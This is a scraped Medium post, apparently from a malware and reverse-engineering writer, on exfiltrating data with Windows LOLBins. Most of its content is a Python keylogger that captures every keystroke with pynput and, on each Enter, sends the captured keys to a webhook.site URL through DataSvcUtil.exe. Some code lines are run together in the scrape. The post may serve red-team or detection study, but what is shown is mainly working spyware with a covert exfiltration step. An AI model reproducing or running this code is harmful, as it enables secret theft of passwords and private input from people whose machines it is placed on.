Image for post
Image for post

Data Exfiltration with LOLBins

Image for post
Image for post
/uri:serviceuri — At this point you need to insert the URL containing the data that will be exfiltrated
Image for post
Image for post
Event with webhook.site
Image for post
Image for post
Image for post
Image for post
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocessURL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)print(f'last key: {str(key)}')
print("")if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''if key == 0x03:
sys.exit(0)if __name__ == "__main__":
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)

Written by

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store